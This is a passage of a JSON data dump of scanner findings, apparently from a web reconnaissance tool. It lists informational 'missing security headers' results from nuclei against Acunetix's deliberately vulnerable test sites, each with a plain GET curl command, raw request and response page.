Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/login", + "discovered_date": "2024-11-13T02:41:15.967Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 505, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:41:16.116Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 506, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "discovered_date": "2024-11-13T02:41:16.258Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:105at HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 507, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "discovered_date": "2024-11-13T02:41:16.399Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/partials HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 508, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/contact", + "discovered_date": "2024-11-13T02:41:16.552Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /contact HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 509, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "discovered_date": "2024-11-13T02:41:16.694Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /forgotpw HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 510, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:41:16.836Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 511, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:41:16.982Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 512, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:17.133Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 513, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:41:17.272Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to 